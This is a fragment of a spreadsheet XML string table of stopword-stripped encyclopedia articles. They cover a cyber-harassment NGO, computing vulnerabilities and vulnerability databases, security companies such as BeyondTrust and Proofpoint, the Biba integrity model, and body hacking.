    <t>Akancha Srivastava Foundation</t>
  </si>
  <si>
    <t>akancha srivastava, founder akancha srivastava foundation. foundation formed 2017. certified, non-profit organization india works education empowerment people imparting knowledge cyber safety initiative akancha against harassment history akancha srivastava founded non-profit organisation 2017 personal experience involved severe cyber stalking. decided take cause build india's movement cyber harassment.foundation conducted workshops across schools, colleges, universities, working spaces across country. indian police collaborated knowledge creation addressing complaints. educators officers joined hands too. activities "akancha against harassment" social impact initiative fights cyber harassment empowers people protect cyber harassment forms like- cyber stalking, bullying, cyber grooming, morphing, blackmail, acts voyeurism, revenge pornography impostering. foundation several tools enabling 24x7 helpline recognized supported indian police across states. organisation creates awareness through: chatbot launched 2018, chatbot educates cyber harassment steps taken counter option available connect foundation. workshops conducted schools, colleges, institutions. podcasts podcasts guests indian police, officers, educators, lawyers, mental health professionals fitness experts share/address/guide different aspects cyber safety inform citizen rights laws.the ngo's board advisors include karnataka's inspector general police roopa moudgil, up's inspector general police navniet sekera, paytm founder vijay shekhar sharma, maharashtra's inspector general police krishna prakash, rajsamand princess diya kumari, innov8 founder ritesh malik. this helps victims cyber harassment connect police authorities. references external links official website</t>
  </si>
  <si>
    <t>Vulnerability (computing)</t>
  </si>
  <si>
    <t>vulnerabilities flaws computer system weaken overall security device/system. vulnerabilities weaknesses either hardware itself, software runs hardware. vulnerabilities exploited threat actor, attacker, cross privilege boundaries (i.e. perform unauthorized actions) within computer system. exploit vulnerability, attacker must least applicable tool technique connect system weakness. frame, vulnerabilities also known attack surface. vulnerability management cyclical practice varies theory contains common processes include: discover assets, prioritize assets, assess perform complete vulnerability scan, report results, remediate vulnerabilities, verify remediation repeat. this practice generally refers software vulnerabilities computing systems. agile vulnerability management refers preventing attacks identifying vulnerabilities quickly possible.a security risk often incorrectly classified vulnerability. vulnerability meaning risk lead confusion. risk potential significant impact resulting exploit vulnerability. then vulnerabilities without risk: example affected asset value. vulnerability known instances working fully implemented attacks classified exploitable vulnerability—a vulnerability exploit exists. window vulnerability time security hole introduced manifested deployed software, access removed, security available/deployed, attacker disabled—see zero-day attack. security (security defect) narrower concept. there vulnerabilities related software: hardware, site, personnel vulnerabilities examples vulnerabilities software security bugs. constructs programming languages difficult properly manifest large numbers vulnerabilities. definitions 27005 defines vulnerability weakness asset group assets exploited threats, asset anything value organization, business operations, continuity, including information resources support organization's missionietf 4949 vulnerability flaw weakness system's design, implementation, operation management could exploited violate system's security policythe committee national security systems united states america defined vulnerability cnss instruction 4009 dated april 2010 national information assurance glossary: vulnerability—weakness information system, system security procedures, internal controls, implementation could exploited threat source.many nist publications define vulnerability context different publications: fismapedia term provide list. between 800-30, give broader one: flaw weakness system security procedures, design, implementation, internal controls could exercised (accidentally triggered intentionally exploited) result security breach violation system's security policy. enisa defines vulnerability existence weakness, design, implementation error lead unexpected, undesirable event [g.11] compromising security computer system, network, application, protocol involved.(itsec)the open group defines vulnerability probability threat capability exceeds ability resist threat.factor analysis information risk (fair) defines vulnerability probability asset unable resist actions threat agentaccording fair vulnerability related control strength, i.e. strength control compared standard measure force threat capabilities, i.e. probable level force threat agent capable applying asset. isaca defines vulnerability risk framework weakness design, implementation, operation internal controldata computer security: dictionary standards concepts terms, authors dennis longley michael shain, stockton press, isbn 0-935859-17-9, defines vulnerability computer security, weakness automated systems security procedures, administrative controls, internet controls, etc., could exploited threat gain unauthorized access information disrupt critical processing. computer security, weakness physical layout, organization, procedures, personnel, management, administration, hardware software exploited cause harm system activity. computer security, weakness flaw existing system. attack harmful event, opportunity available threat agent mount attack.matt bishop dave bailey give following definition computer vulnerability: computer system composed states describing current configuration entities make computer system. system computes application state transitions change state system. states reachable given initial state using state transitions fall class authorized unauthorized, defined security policy. paper, definitions classes transitions considered axiomatic. vulnerable state authorized state unauthorized state reached using authorized state transitions. compromised state state reached. attack sequence authorized state transitions compromised state. definition, attack begins vulnerable state. vulnerability characterization vulnerable state distinguishes non-vulnerable states. generic, vulnerability characterize many vulnerable states; specific, characterize one...national information assurance training education center defines vulnerability: weakness automated system security procedures, administrative controls, internal controls, forth, could exploited threat gain unauthorized access information disrupt critical processing. weakness system security procedures, hardware design, internal controls, etc. could exploited gain unauthorized access classified sensitive information. weakness physical layout, organization, procedures, personnel, management, administration, hardware, software exploited cause harm system activity. presence vulnerability cause harm; vulnerability merely condition conditions allow system activity harmed attack. assertion primarily concerning entities internal environment (assets); asset class assets) vulnerable way, possibly involving agent collection agents); write: v(i,e) where: empty set. susceptibility various threats. properties specific internal entity that, union properties specific external entity, implies risk. characteristics system cause suffer definite degradation (incapability perform designated mission) result subjected certain level effects unnatural (manmade) hostile environment. vulnerability risk factor models resource (either physical logical) vulnerabilities exploited threat actor. result potentially compromise confidentiality, integrity availability resources (not necessarily vulnerable one) belonging organization and/or parties involved (customers, suppliers). so-called triad cornerstone information security. attack active attempts alter system resources affect operation, compromising integrity availability. "passive attack" attempts learn make information system affect system resources, compromising confidentiality. owasp (see figure) depicts phenomenon slightly different terms: threat agent attack vector exploits weakness (vulnerability) system related security controls, causing technical impact resource (asset) connected business impact. overall picture represents risk factors risk scenario. information security management system policies concerned information security management system (isms), developed manage, according risk management principles, countermeasures ensure security strategy following rules regulations applicable given organization. these countermeasures also called security controls, applied transmission information, called security services. classification vulnerabilities classified according asset class related hardware susceptibility humidity dust susceptibility unprotected storage age-based wear causes failure over-heating software insufficient testing insecure coding lack audit trail design flaw network unprotected communication lines (e.g. lack cryptography) insecure network architecture personnel inadequate recruiting process inadequate security awareness insider threat physical site area subject natural disasters (e.g. flood, earthquake) interruption power source organizational lack regular audits lack continuity plans lack security causes complexity: large, complex systems increase probability flaws unintended access points. familiarity: using common, well-known code, software, operating systems, and/or hardware increases probability attacker find knowledge tools exploit flaw. connectivity: more physical connections, privileges, ports, protocols, services time accessible increase vulnerability. password management flaws: computer user uses weak passwords could discovered brute force. computer user stores password computer program access users re-use passwords many programs websites.fundamental operating system design flaws: operating system designer chooses enforce suboptimal policies user/program management. example, operating systems policies default permit grant every program every user full access entire computer. this operating system flaw allows viruses malware execute commands behalf administrator. internet website browsing: some internet websites contain harmful spyware adware installed automatically computer systems. after visiting websites, computer systems become infected personal information collected passed third party individuals. software bugs: programmer leaves exploitable software program. software allow attacker misuse application. unchecked user input: program assumes user input safe. programs check user input allow unintended direct execution commands statements (known buffer overflows, injection non-validated inputs). learning past mistakes: example vulnerabilities discovered ipv4 protocol software discovered ipv6 implementations.the research shown vulnerable point information systems human user, operator, designer, human: humans considered different roles asset, threat, information resources. social engineering increasing security concern. consequences impact security breach high. most legislation sees failure managers address systems applications vulnerabilities known misconduct; managers responsibility manage risk. privacy forces managers reduce impact likelihood security risk. information technology security audit independent people certify environment managed properly lessen responsibilities, least demonstrated good faith. penetration test form verification weakness countermeasures adopted organization: white hacker tries attack organization's information technology assets, find easy difficult compromise security. proper professionally manage risk adopt information security management system, iso/iec 27002 risk follow them, according security strategy forth upper management.one concept information security principle defence depth, i.e. multilayer defense system can: prevent exploit detect intercept attack find threat agents prosecute themintrusion detection system example class systems used detect attacks. physical security measures physically protect information asset: somebody physical access information asset, widely accepted attacker access information make resource unavailable legitimate users. some sets criteria satisfied computer, operating system applications order meet good security level developed: itsec common criteria examples. vulnerability disclosure coordinated disclosure (some refer 'responsible disclosure' considered biased term others) vulnerabilities topic great debate. reported tech herald august 2010, "google, microsoft, tippingpoint, rapid7 issued guidelines statements addressing deal disclosure going forward." method typically full disclosure, details vulnerability publicized, sometimes intent pressure software author publish quickly. january 2014 google revealed microsoft vulnerability microsoft released patch microsoft representative called coordinated practices among software companies revealing disclosures. vulnerability inventory mitre corporation maintains incomplete list publicly disclosed vulnerabilities system called common vulnerabilities exposures. this information immediately shared national institute standards technology (nist), vulnerability given risk score using common vulnerability scoring system (cvss), common platform enumeration (cpe) scheme, common weakness enumeration. cloud service providers often list security issues services using system. there currently universal standard cloud computing vulnerability enumeration, severity assessment, unified tracking mechanism. open cvdb initiative community-driven centralized cloud vulnerability database catalogs vulnerabilities, lists steps users take detect prevent issues environments.owasp maintains list vulnerability classes educating system designers programmers, therefore reducing likelihood vulnerabilities written unintentionally software. vulnerability disclosure date time disclosure vulnerability defined differently security community industry. commonly referred kind public disclosure security information certain party". usually, vulnerability information discussed mailing list published security site results security advisory afterward. time disclosure first date security vulnerability described channel disclosed information vulnerability fulfill following requirement: information freely available public vulnerability information published trusted independent channel/source vulnerability undergone analysis experts risk rating information included upon disclosureidentifying removing vulnerabilitiesmany software tools exist discovery (and sometimes removal) vulnerabilities computer system. though tools provide auditor good overview possible vulnerabilities present, replace human judgment. relying solely scanners yield false positives limited-scope view problems present system. vulnerabilities found every major operating system including windows, macos, various forms unix linux, openvms, others. reduce chance vulnerability used system constant vigilance, including careful system maintenance (e.g. applying software patches), best practices deployment (e.g. firewalls access controls) auditing (both development throughout deployment lifecycle). locations vulnerabilities manifest vulnerabilities related manifest physical environment system personnel (i.e. employees, management) administration procedures security policy business operation service delivery hardware including peripheral devices software (i.e. premises cloud) connectivity (i.e. communication equipment facilities)it evident pure technical approach cannot always protect physical assets: administrative procedure maintenance personnel enter facilities people adequate knowledge procedures, motivated follow proper care. however, technical protections necessarily stop social engineering (security) attacks. examples vulnerabilities: attacker finds uses buffer overflow weakness install malware exfiltrate sensitive data; attacker convinces user open email message attached malware; flood damages one's computer systems installed ground floor. software vulnerabilities common types software flaws lead vulnerabilities include: memory safety violations, buffer overflows over-reads dangling pointers input validation errors, code injection cross-site scripting applications directory traversal e-mail injection format string attacks http header injection http response splitting injection privilege-confusion bugs, clickjacking cross-site request forgery applications bounce attack privilege escalation race conditions, symlink races time-of-check-to-time-of-use bugs side-channel attack timing attack user interface failures, blaming victim prompting user make security decision without giving user enough information answer race conditions warning fatigue user conditioning.some coding guidelines developed large number static code analyzers used verify code follows guidelines. also browser security computer emergency response team information security internet security mobile security vulnerability scanner responsible disclosure full disclosure references external links media related vulnerability (computing) wikimedia commons security advisories links open directory http://dmoz-odp.org/computers/security/advisories_and_patches/</t>
  </si>
  <si>
    <t>Vulnerability Discovery Model</t>
  </si>
  <si>
    <t>vulnerability discovery model (vdm) uses discovery event data software reliability models predicting same. thorough presentation techniques available numerous model implementations available mcmcbayes open source repository. several examples include: alhazmi-malaiya: time based model (alhazmi-malaiya logistic (aml) model) alhazmi-malaiya: effort based model rescorla: quadratic model exponential model anderson: thermodynamic model kim: weibull model linear model hump-shaped model independent dependent model vulnerability discovery modeling using bayesian model averaging multivariate vulnerability discovery models also attack (computing) computer security information security risk threat (computer) vulnerability (computing) references</t>
  </si>
  <si>
    <t>Vulnerability assessment (computing)</t>
  </si>
  <si>
    <t>vulnerability assessment process defining, identifying classifying security holes information technology systems. attacker exploit vulnerability violate security system. some known vulnerabilities authentication vulnerability, authorization vulnerability input validation vulnerability. purpose before deploying system, first must series vulnerability assessments ensure build system secure known security risks. when vulnerability discovered, system administrator perform assessment, discover modules vulnerable, start patch process. after fixes place, another assessment verify vulnerabilities actually resolved. this cycle assess, patch, re-assess become standard method many organizations manage security issues. primary purpose assessment find vulnerabilities system, assessment report conveys stakeholders system secured vulnerabilities. intruder gained access network consisting vulnerable servers, safe assume gained access systems well. because assessment report, security administrator able determine intrusion occurred, identify compromised assets take appropriate security measures prevent critical damage system. assessment types depending system vulnerability assessment many types level. host assessment host assessment looks system-level vulnerabilities insecure file permissions, application level bugs, backdoor trojan horse installations. requires specialized tools operating system software packages used, addition administrative access system tested. host assessment often costly term time, thus used assessment critical systems. tools like cops tiger popular host assessment. network assessment network assessment assess network known vulnerabilities. locates systems network, determines network services use, analyzes services potential vulnerabilities. this process require configuration changes systems assessed. unlike host assessment, network assessment requires little computational cost effort. vulnerability assessment penetration testing vulnerability assessment penetration testing different testing methods. they differentiated basis certain specific parameters. references external links dowd; mcdonald; schuh (2007). software security assessment identifying preventing software vulnerabilities (pdf). indianapolis, ind.: addison-wesley. isbn 978-0-321-44442-4. oclc 70836623. archived original (pdf) 2020-10-08. list known vulnerabilities</t>
  </si>
  <si>
    <t>BeyondTrust</t>
  </si>
  <si>
    <t>beyondtrust (formerly symark) american company develops, markets, supports family privileged identity management access management (pim/pam), privileged remote access, vulnerability management products unix, linux, windows macos operating systems. beyondtrust founded 2006 provided least privilege management software microsoft windows unix vendor symark acquired beyondtrust 2009. 2018, company acquired bomgar, developer remote support software. cases, beyondtrust adopted company name. history symark symark founded 1985 vax/vms utility software company angeles' fernando valley. name derived initials founders, sommers doug yarrow. symark also client-server computing vendor, later acquiring license unix security product (now owned quest software) rebranding version powerbroker. symark relocated westlake village, california, agoura hills. company focused identity, access, password management privileged users unix systems. from 2003—2008 company expanded spain, portugal, japan latin america. during time period, also grew almost percent fastest growing private companies angeles area. original beyondtrust 2003, autoprof introduced autoprof policy maker, first commercial product build upon microsoft's built-in group policy objects make common tasks like mapping network drives sharing printer connections easier. 2005, autoprof grew revenue previous year changed company name desktopstandard. four million desktops management desktopstandard's software across 3,500 customers. between 2003—2005, desktopstandard added products portfolio rbac, password management, identity access management windows. 2006, microsoft acquired desktopstandard's products, desktopstandard's formed company (beyondtrust) around remaining policy maker application security product. acquisitions 2009: symark acquired windows-based business beyondtrust 2009 approximately million adopted beyondtrust company name.2011: beyondtrust acquired software likewise software. acquisition expanded portfolio "inside perimeter" security capabilities windows unix-based systems include authentication auditing management cross-platform cloud environments.may 2012: beyondtrust acquired vulnerability management pioneer eeye digital security.december 2012: beyondtrust acquired blackbird group.september 2014: veritas capital acquires beyondtrust $310 million.october 2018: bomgar acquires beyondtrust veritas. bomgar bomgar remote support provider allows support technicians remotely connect end-user systems firewalls computer mobile device. using bomgar representative console, technology support professionals access control systems devices remotely, including personal computers, smartphones, tablets, servers, switches, point-of-sale systems others.the company originated joel bomgaars developed remote support solutions back wasted hours spent travelling working support professional local company. june 2003, one-page, static website selling own, home-grown remote access solution, calling expertvnc. soon thereafter, college friends, nathan mcneill patrick norman, joined bomgar co-founders.in 2004, expertvnc changed name networkstreaming. next month changed cloud-based product appliance model, differentiating similar remote support solutions. february 2007, networkstreaming changes company name bomgar, simplified form joel bomgaars' family name also chose professionally himself.bomgar's first private equity investors, associates, placed majority investment bomgar 2014.in april 2018, francisco partners announced acquired bomgar thoma bravo, owned bomgar since june 2016. financial details deal disclosed. bomgar operates name beyondtrust. also remote support comparison remote desktop software remote desktop software virtual help desk references external links bomgar bomgar community</t>
  </si>
  <si>
    <t>Vulnerability database</t>
  </si>
  <si>
    <t>vulnerability database (vdb) platform aimed collecting, maintaining, disseminating information discovered computer security vulnerabilities. database customarily describe identified vulnerability, assess potential impact affected systems, workarounds updates mitigate issue. assign unique identifier vulnerability cataloged number (e.g. 123456) alphanumeric designation (e.g. vdb-2020-12345). information database made available pages, exports, api. provide information free, pay, combination thereof. history first vulnerability database "repaired security bugs multics", published february 1973 jerome saltzer. described list list known ways user break circumvent protection mechanisms multics". list initially kept somewhat private intent keeping vulnerability details solutions could made available. published list contained local privilege escalation vulnerabilities three local denial service attacks. types vulnerability databases major vulnerability databases x-force database, symantec securityfocus database, open source vulnerability database (osvdb) aggregate broad range publicly disclosed vulnerabilities, including common vulnerabilities exposures (cve). primary purpose cve, mitre, attempt aggregate public vulnerabilities give standardized format unique identifier. many vulnerability databases develop received intelligence investigate providing vulnerability risk scores, impact ratings, requisite workaround. past, paramount linking vulnerability databases critical patches debugs shared inhibit hackers accessing sensitive information private systems. national vulnerability database (nvd), national institute standards technology (nist), operated separately mitre-run database, includes vulnerability information cve. serves enhancement data providing common vulnerability scoring system (cvss) risk scoring common platform enumeration (cpe) data. open source vulnerability database provides accurate, technical unbiased index vulnerability security. comprehensive database cataloged 121,000 vulnerabilities. osvdb founded august 2002 launched march 2004. primitive beginning, newly identified vulnerabilities investigated site members explanations detailed website. however, necessity service thrived, need dedicated staff resulted inception open security foundation (osf) founded non-profit organisation 2005 provide funding security projects primarily osvdb. osvdb closed april 2016.the u.s. national vulnerability database comprehensive cyber security vulnerability database formed 2005 reports cve. primary cyber security referral tool individuals industries alike providing informative resources current vulnerabilities. holds excess 100,000 records. similar osvdb, publishes impact ratings categorises material index provide users intelligible search system. other countries vulnerability databases, chinese national vulnerability database russia's data security threats database. variety commercial companies also maintain vulnerability databases, offering customers services deliver updated vulnerability data machine-readable format well portals. examples include symantec's deepsight portal vulnerability data feed, secunia's (purchased flexera) vulnerability manager accenture's vulnerability intelligence service (formerly idefense). vulnerability databases advise organisations develop, prioritize, execute patches mitigations attempt rectify critical vulnerabilities. however, often lead creation additional susceptibilities patches created hastily thwart system exploitations violations. depending upon level user organisation, warrant appropriate access vulnerability database provides user disclosure known vulnerabilities affect them. justification limiting access individuals impede hackers versed corporation system vulnerabilities could potentially exploited. vulnerability databases vulnerability databases contain vast array identified vulnerabilities. however, organisations possess expertise, staff, time revise remedy potential system susceptibilities hence vulnerability scoring method quantitatively determining severity system violation. multitude scoring methods exist across vulnerability databases us-cert sans institute's critical vulnerability analysis scale common vulnerability scoring system (cvss) prevailing technique vulnerability databases including osvdb, vfeed nvd. cvss based upon three primary metrics: base, temporal environmental provide vulnerability rating. base this metric covers immutable properties vulnerability potential impact exposure confidential information, accessibility information aftermath irretrievable deletion information. temporal temporal metrics denote mutable nature vulnerability example credibility exploitability, current state system violation development workarounds could applied. environmental this aspect cvss rates potential loss individuals organisations vulnerability. furthermore, details primary target vulnerability ranging personal systems large organisations number potentially affected individuals.the complication utilising different scoring systems consensus severity vulnerability thus different organisations overlook critical system exploitations. benefit standardised scoring system like cvss published vulnerability scores assessed, pursued remedied rapidly. organisations individuals alike determine personal impact vulnerability system. benefits derived vulnerability databases consumers organisations exponential information systems become increasingly embedded, dependency reliance grows, opportunity data exploitation. common security vulnerabilities listed vulnerability databases initial deployment failure although functionality database appear unblemished, without rigorous testing, exiguous flaws allow hackers infiltrate system's cyber security. frequently, databases published without stringent security controls hence sensitive material easily accessible. injection database attacks recurrent form cyber security breaches recorded vulnerability databases. nosql injections penetrate traditional information systems data platforms respectively interpolate malicious statements allowing hackers unregulated system access. misconfigured databases established databases ordinarily fail implement crucial patches suggested vulnerability databases excessive workload necessity exhaustive trialling ensure patches update defective system vulnerability. database operators concentrate efforts major system deficiencies offers hackers unmitigated system access neglected patches. inadequate auditing databases require audit tracks record data amended accessed. when systems created without necessary auditing system, exploitation system vulnerabilities challenging identify resolve. vulnerability databases promulgate significance audit tracking deterrent cyber attacks.data protection essential business personal financial information asset purloining sensitive material discredit reputation firm. implementation data protection strategies imperative guard confidential information. some hold view initial apathy software designers turn, necessitates existence vulnerability databases. systems devised greater diligence, impenetrable nosql injections making vulnerability databases redundant. notes references also chinese national vulnerability database common vulnerabilities exposures data security threats database japan vulnerability notes national vulnerability database open source vulnerability database</t>
  </si>
  <si>
    <t>Proofpoint, Inc.</t>
  </si>
  <si>
    <t>proofpoint, inc. american enterprise security company based sunnyvale, california provides software service products email security, data loss prevention, electronic discovery, email archiving. 2021, proofpoint acquired private equity firm thoma bravo $12.3 billion. history company company founded july 2002 eric hahn, formerly netscape communications. launched july 2003, raising million series funding round, releasing first product, lining customers references, backed venture investors benchmark capital stanford university. additional million series funding york-based ventures announced october, 2003.proofpoint became publicly traded company april 2012. time initial public offering (ipo), company's shares traded apiece; investors purchased million shares ipo, raising million.on april 2021, proofpoint announced agreed acquired private equity firm thoma bravo. product history company's first product proofpoint protection server (pps) medium large businesses. incorporated described "mlx technology", proprietary machine learning algorithms applied problem accurately identifying spam email using 10,000 different attributes differentiate spam valid email. company joined dozens anti-spam software providers business opportunity fueled exponential increase spam volume threatening worker productivity, making spam business priority. according 2004 national technology readinesed number spam detection attributes 50,000.in 2004, strict hipaa regulations governing financial disclosures privacy health care data prompted proofpoint begin developing products would automatically identify intercept outbound email containing sensitive information.in march 2004, proofpoint introduced first hardware appliance, p-series message protection appliance (later renamed proofpoint messaging security gateway), using hardened linux kernel proofpoint's protection server software. tested infoworld found stop spam.another product introduction november 2004 included protection server 3.0, email firewall mlx-based dynamic reputation analysis, content security suite, plug-in modules designed scanning outbound messages attachments assist compliance data protection regulations sarbanes–oxley, hipaa, gramm–leach–bliley. combination, known proofpoint messaging security gateway appliance. reviewed channelweb, observed used "combination technologies: policy-based management, spam-filtering engine adaptive learning technology."proofpoint introduced product, network content sentry, add-on appliance content security suite august 2005. designed monitor online messaging email, appliance monitors mail, message boards, blogs ftp-based communications. proofpoint also introduced policy-based email encryption features, using identity-based encryption technology licensed voltage security. virtual appliance development step towards simpler operational requirements, proofpoint messaging security gateway virtual edition released april 2007. product runs virtual appliance host running vmware's virtual server software. moving dedicated hardware appliance virtual server eliminates problems associated proprietary hardware reduces upgrade costs, though require knowledge vmware's virtual server architecture. proofpoint messaging security gateway v5.0 released june 2007, based new, integrated architecture, combining capabilities single platform. could either dedicated appliance, virtual appliance, software suite. icsa labs, independent division verizon business, announced april 2007, certified anti-spam products testing program, proofpoint messaging security gateway. goal icsa labs' anti-spam product testing certification evaluate product effectiveness detecting removing spam. guidelines also address well products recognize e-mail messages legitimate sources. software service moving software-as-a-service business, proofpoint introduced proofpoint demand, hosted version email security data loss prevention offerings. may, 2008, company's hosted offerings expanded introduction proofpoint demand—standard edition. product targeted small-to-medium size businesses need email security servers on-site personnel. products proofpoint products designed solve three business problems: advanced cybersecurity threats, regulatory compliance, brand-impostor fraud (which calls "digital risk"). these products work across email, social media, mobile devices, cloud. email security proofpoint offers software saas aimed different facets email security. flagship product proofpoint messaging security gateway. messaging security gateway web-based application offers spam protection; based user defined rules well dynamically updated definitions, anti-virus scanning, configurable email firewall rules. additionally, june 2008, proofpoint acquired fortiva, inc., provider on-demand email archiving software legal discovery, regulatory compliance email storage management. fortiva used exchange journaling automatically archive internal external communications users search archived messages, including attachments, directly search folder outlook. cybersecurity proofpoint's security portfolio includes products stop traditional cyberattacks (delivered malicious attachments urls) socially engineered attacks—such business email compromise (bec) credential phishing—that malware. uses blend sandbox analysis, reputational analysis, automated threat data, human threat intelligence attributes sender/recipient relationship, headers, content, detect potential threats. automated encryption, data-loss prevention forensics-gathering tools designed speed incident response mitigate damage costs threats through. portfolio also includes protection social-media account takeovers, harmful mobile apps, rogue wi-fi networks. regulatory compliance proofpoint's compliance products designed reduce manual labor involved identifying potentially sensitive data, managing supervising compliance government industry rules, producing quickly e-discovery legal requests. digital risk proofpoint's digital risk products aimed companies seeking stop cybercriminals impersonating brand harm customers, partners, brand's reputation. email digital risk portfolio includes authentication technology prevent email domain spoofing. social media, stops scams fraudsters create fake customer-service accounts find people seeking help social media trick handing account credentials visiting malicious website. mobile, finds counterfeit apps distributed mobile stores.in 2016 forrester wave digital risk monitoring, 2016 proofpoint digital risk social media product included evaluation nine vendors emerging market. these monitor "digital" (i.e. social, mobile, web, dark web) channels detect, prevent, malicious unwanted content undermining organizational efforts build brand across major social media platforms. october 2014 proofpoint acquired nexgate, inc., social media security compliance vendor. november 2015 proofpoint acquired socialware inc., compliance workflow content capture review technology company. acquisitions references external links official website</t>
  </si>
  <si>
    <t>PacketFence</t>
  </si>
  <si>
    <t>packetfence open-source network access control (nac) system provides following features: registration, detection abnormal network activities, proactive vulnerability scans, isolation problematic devices, remediation captive portal, 802.1x, wireless integration user-agent dhcp fingerprinting. company develops packetfence, inverse inc. acquired akamai technologies february 1st, 2021.packetfence version supports enterprise linux derivatives, notably centos, debian stretch. inverse inc. also releasing version packetfence dubbed "zero effort nac", standalone virtual appliance preconfigured installation packetfence, making easier ever deploy environment. packetfence version added support enterprise linux derivatives, notably centos, debian bullseye. https://en.wikipedia.org/wiki/ further reading marcotte, ludovic; gehl, dominik (2007-04-01). "packetfence". linux journal. retrieved 2009-03-11. wallen, jack (2007-12-18). "solutionbase: packetfence stop unwanted network traffic". techrepublic. retrieved 2015-11-25. wallen, jack (2007-12-20). "solutionbase: installing configuring network access control packetfence". techrepublic. retrieved 2015-11-25. wallen, jack (2007-12-21). "solutionbase: administer packetfence ease interface". techrepublic. retrieved 2015-11-25. balzard, regis; gehl, dominik (2008-01-01). "packetfence revisited". linux journal. retrieved 2009-03-11. gehl, dominik; balzard, regis (2008-08-20). "packetfence offers client-free open-source nac". linuxworld.com. retrieved 2009-03-11. buford, cory (2008-09-23). "securing network packetfence". linux.com. archived original 2009-03-04. retrieved 2009-03-11. bilodeau, olivier (2011-12-01). "packetfence: because hard!" (pdf). insecure magazine. retrieved 2012-02-23. external links packetfence website packetfence github references floss weekly 155: packetfence, floss weekly podcast, march 2011, retrieved march 2011.</t>
  </si>
  <si>
    <t>Biba Model</t>
  </si>
  <si>
    <t>biba model biba integrity model developed kenneth biba 1975, formal state transition system computer security policy describes access control rules designed ensure data integrity. data subjects grouped ordered levels integrity. model designed subjects corrupt data level ranked higher subject, corrupted data lower level subject. general model developed address integrity core principle, direct inverse bell–lapadula model. features general, preservation data integrity three goals: prevent data modification unauthorized parties prevent unauthorized data modification authorized parties maintain internal external consistency (i.e. data reflects real world)this security model directed toward data integrity (rather confidentiality) characterized phrase: "read write down". this contrast bell-lapadula model characterized phrase "read down, write up". biba model, users create content integrity level monk write prayer book read commoners, read high priest). conversely, users view content integrity level monk read book written high priest, read pamphlet written lowly commoner). another analogy consider military chain command. general write orders colonel, issue orders major. fashion, general's original orders kept intact mission military protected (thus, "read integrity). conversely, private never issue orders sergeant, never issue orders lieutenant, also protecting integrity mission ("write down"). biba model defines security rules, first similar bell–lapadula model. these first rules reverse bell–lapadula rules: simple integrity property states subject given level integrity must read data lower integrity level read down). (star) integrity property states subject given level integrity must write data higher level integrity write up). invocation property states process cannot request higher access; subjects equal lower level. implementations freebsd, biba model implemented mac_biba policy. linux, biba model implemented general dynamics mission systems pitbull product. xts-400, biba model implemented systems's xts-400 operating system. also discretionary access control graham–denning model mandatory access control multilevel security security-enhanced linux security modes operation take-grant protection model clark–wilson model references external links "integrity policies" power point presentation university colorado colorado springs</t>
  </si>
  <si>
    <t>PAS754</t>
  </si>
  <si>
    <t>754:2014 british standards institution (bsi) software publicly available specification, published 2014. 754:2014 withdrawn following publication 10754-1:2018 february 2018. defines overall principles effective software trustworthiness, includes technical, physical, cultural behavioral measures alongside effective leadership governance. also identifies necessary tools, techniques processes addresses safety, reliability, availability, security resilience issues. structure standard official title standard "software trustworthiness governance management specification". 754:2014 seven main clauses, plus three annexes, cover: introduction scope normative references terms, definitions acronyms approach concepts principles annex system lifecycle annex techniques bibliography development development pas754 trustworthy software initiative, government sponsored public good activity aimed making software better.the following organizations involved development specification: atkins group; bis; cpni; certification europe; montfort university; group training; iet; microsoft (uk); misra; nexor; oxford brookes university; qinetiq; techuk university warwick. references</t>
  </si>
  <si>
    <t>Body hacking</t>
  </si>
  <si>
    <t>body hacking application hacker ethic (often combination high risk tolerance) pursuit enhancement change body's functions technological means, do-it-yourself cybernetic devices introducing biochemicals.grinders self-identified community body hackers. many grinders identify biopunk movement, open-source transhumanism, techno-progressivism. grinder movement strongly associated body modification movement practices actual implantation cybernetic devices organic bodies method working towards transhumanism. this includes designing installing do-it-yourself body enhancements, magnetic implants. biohacking emerged growing trend non-institutional science technology development."biohacking" also refer managing one's biology using combination medical, nutritional, electronic techniques. this include nootropics, nontoxic substances, and/or cybernetic devices recording biometric data quantified self movement). ideology grinders largely identify transhumanist biopunk ideologies. transhumanism belief possible desirable fundamentally alter human condition technologies inaugurate superior post-human being. kara platoni categorizes technological modifications "hard" biohacking, noting desire expand boundaries human perception even create "new senses".biopunk techno-progressive cultural intellectual movement advocates open access genetic information espouses liberating potential truly democratic technological development. like punk movements, biopunk encourages ethic. "grinders" adhere anarchist strain biopunk emphasizes non-hierarchical science diy.cyborgs cyborg theory strongly influence techno-progressivism transhumanism thus influential diy-bio movement grinder movement general. some biohackers, grinders british professor cybernetics kevin warwick, actively design implement technologies integrated directly organic body. examples include magnetic fingertip implants warwick's "project cyborg". cyborg theory kickstarted 1985 publication donna haraway's influential "cyborg manifesto" traced back manfred clynes nathan klines' article "cyborgs space". this body theory criticizes rigidity ontological boundaries attempts denaturalize artificial dichotomies. notable people kevin warwick british scientist professor cybernetics instrumental advancing popularizing cyborg technology biohacking self-experiments. steve mann professor electrical computer engineering dedicated career inventing, implementing, researching cyborg technologies, particular, wearable computing technologies. amal graafstra known implanting rfid chip 2005 developing human-friendly chips, including first-ever implantable chip. 2013, founded biotech startup company dangerous things. also author rfid toys speaker biohacking topics, including tedx talk. also built smartgun activated implants. created implantable cryptographic processor called vivokey personal identity cryptography applications. lepht anonym biohacker transhumanist known self-surgeries material implementation transhumanist ideologies. winslow strong mathematician physicist. cannon software developer, entrepreneur, co-founder biotech startup company grindhouse wetware. jeffrey tibbetts organiser grindfest events california. biohacking researcher whose work featured number sources, gizmodo. alex smith biohacker known work developing implants, firefly implants. spoken various conferences, including defcon, featured number news articles. rich known implanting headphones tragi 2013, well work vibrating pelvic implant called lovetron9000. biohacking activities used justification remove parental custody rights 2016. brian hanley american microbiologist became known first biohackers engineer using gene therapy human enhancement life extension. meow-ludo disco gamma meow-meow implanted microchip used opal card sydney, australia, though subsequently fined $220 failing comply existing transit laws. also barnaby joyce division england. josiah zayner attempted full fecal microbiota transplant february 2016. dave asprey american entrepreneur author founded bulletproof 2013. asprey written five books biohacking. 2019, asprey spent least million "hacking biology", including parts bone marrow removed later re-injecting stem cells, taking supplements daily, following strict diet, bathing infrared light, using hyperbaric oxygen chamber, wearing irlen lenses correct irlen syndrome. biohacker hannes sjöblad experimenting chip implants since 2015. talk echappée voléé 2016 paris, sjöblad said also implanted chip forefinger thumb uses unlock doors, make payments, unlock phone, essentially replace anything pockets. also hosted several "implant parties", interested parties chips implanted. groups organizations grindhouse wetware, biotechnology startup company based pittsburgh, pennsylvania. ksec solutions, worldwide distributor consultancy based united kingdom. also neurohacking do-it-yourself biology 